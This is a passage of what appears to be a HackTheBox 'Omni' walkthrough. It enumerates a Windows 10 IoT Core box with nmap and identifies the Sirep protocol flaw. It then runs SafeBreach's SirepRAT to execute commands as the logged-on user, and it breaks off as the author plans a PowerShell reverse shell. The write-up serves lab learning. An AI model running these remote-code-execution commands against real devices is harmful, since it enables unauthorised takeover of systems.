Omni HTB

The only way to learn a new programming language is by writing programs in it.
— Dennis Ritchie

What does omni means?
: all : universally omnidirectional.

kali@kali:~$ sudo nmap 10.10.10.204
[sudo] password for kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 14:19 EDT
Nmap scan report for 10.10.10.204
Host is up (0.084s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)

Microsoft Windows RPC
This protocol is developed to provide a transparent communication so that the clients could directly communicate with the servers.

Microsoft IIS httpd
This machine is acting as a web server on port 8080/tcp. The HTTP header is returning ‘Microsoft-HTTPAPI/2.0’. From my knowledge; this web service calling the HTTP.sys, not IIS. Furthermore, the Basic realm is showing ‘Windows Device Portal’, I think this is an IoT (Internet of Things) device. Because the Windows Device Portal (WDP) lets you configure and manage your device remotely over your local network.

Enumerate Web Server

Let’s first try to make a connection to this web service and let’s see what happens. I visited this URL: http://10.10.10.204 and an authentication pop-up .

I got no credentials. A Google search on ‘Windows Device Portal’, provides me with some information from this webpage: Windows Device Portal. This is related to Windows 10 IoT Core. Default the port 8080 means that Development mode (Dev) is enabled from default. The default credentials Administrator and p@ssw0rd, are not working.

Enumerating Windows IoT Core

With this information, I can start enumerating on this Windows IoT Core operating system. I start on Google searching for exploits related to Windows 10 IoT Core. I found that the security researcher Dor Azouri, from SafeBreach had discovered a vulnerability that impacts the Sirep/WPCon communications protocol included with Windows 10 IoT operating system. ZDNet had written a blog article about it back in March 2019: New exploit lets attackers take control of Windows IoT Core devices.

SirepRAT

SafeBreach-Labs have released SirepRAT for a Remote Code Execution (RCE) as SYSTEM on Windows 10 IoT Core. I have cloned this repository.

As I read this repo closely, I could root this box immediately by dumping the SAM and copying the SYSTEM registry files. This RAT is executing as SYSTEM. But, IMO that’s not the intended way, so I proceed.

~$ git clone https://github.com/SafeBreach-Labs/SirepRAT
Password:
Cloning into 'SirepRAT'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 64 (delta 0), reused 0 (delta 0), pack-reused 61
Unpacking objects: 100% (64/64), 5.58 MiB | 1.67 MiB/s, done.

Before I can get this exploit working on my Macbook Pro, I need to install the Python library ‘hexdump’.

~$ easy_install hexdump
Searching for hexdump
Reading https://pypi.org/simple/hexdump/
Downloading https://files.pythonhosted.org/packages/55/b3/279b1d57fa3681725d0db8820405cdcb4e62a9239c205e4ceac4391c78e4/hexdump-3.3.zip#sha256=d781a43b0c16ace3f9366aade73e8ad3a7bd5137d58f0b45ab2d3f54876f20db
Best match: hexdump 3.3
Processing hexdump-3.3.zip
Writing /tmp/easy_install-iaZ7GV/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/easy_install-iaZ7GV/egg-dist-tmp-4m2EP4
zip_safe flag not set; analyzing archive contents...
Copying hexdump-3.3-py2.7.egg to /Library/Python/2.7/site-packages
Adding hexdump 3.3 to easy-install.pth file
Installed /Library/Python/2.7/site-packages/hexdump-3.3-py2.7.egg
Processing dependencies for hexdump
Finished processing dependencies for hexdump

I can now start with SirepRAT. I got various commands at my disposel. I start first by checking which account is currerently logged on.

~$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 30, payload peek: 'C:\Data\Users\DefaultAccount'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>

This script is working and I have verified that this Windows 10 IoT Core device is vulnerable. The current logged on account is ‘DefaultAccount’. The next step is to establish a reverse shell from this device to my machine. This script is able to run arbitrary programs. So, I can start Powershell to establish a Reverse Shell.